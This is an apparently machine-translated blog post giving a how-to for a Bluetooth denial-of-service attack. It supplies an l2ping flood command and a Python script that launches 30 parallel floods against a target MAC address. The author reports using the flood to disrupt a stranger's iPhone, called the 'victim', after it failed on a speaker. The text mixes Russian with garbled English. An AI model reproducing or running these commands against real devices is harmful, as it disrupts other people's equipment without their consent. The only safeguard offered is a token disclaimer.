Disabling bluetooth speakers, dos attack on bluetooth in Linux

1. Scan bluetooth devices

Install blueman . It will be needed in order to find out the mac-address of the desired device. We launch it and find 2 sinister devices.

sudo apt-get install blueman

dos_bluetooth

2. Fight l2ping

sudo l2ping -i hci0 -s размер пакета -f MAC-адрес

Packet size - in bytes, the more allows, the better.

MAC address - bluetooth device address.

This method could not be applied to the column itself, but it worked out to the found iPhone. It turned out to be a device that synced with an audio device.

dos_bluetooth iphone

By running such a command in several terminals , you can disable a powerful stream that will clog the device channel and it will either turn off or start playing with interruptions.

I had to run about 15 terminals. But it all depends on luck, the bandwidth of the bluetooth and the knowledge of the "victim" in this topic.

I'll add from myself :

A small python script that allows you to work with this non-handles.

#!/usr/bin/env python
import subprocess
from time import sleep

try:
# 30 - количество потоков. Не переусерствуейте.
for i in range(1, 30):
#Заменить мак адрес на свой
xterm = "sudo l2ping -i hci0 -s 10 -f 00:00:00:00:00:00"
process = subprocess.Popen(xterm, stderr=subprocess.PIPE, shell=True)
#data = process.communicate()
print(i)
#print(data)
except(KeyboardInterrupt, OSError):
print("Exit.")

Sources and possible other options: ist1 , ist2 , ist3

ps: information provided for informational purposes and is not responsible for it. Use wisely.

16329 2

Comments

Добрый день, Сергей. Я на более новых версиях блютуза не пробовал. Может эта колонка имеет последний блютуз или версию выше, чем у атакуемого устройства. А может есть минимальная программная защита от этого. Жаль что не помогло) Но идея не моя, я описал свою историю всего лишь. Источники на информацию я указал внизу статьи. Извините.
Пробовал на transmart колонке. Ничего из перечисленного не работает!!!
You have to log in to leave a comment. Sign in

Similar articles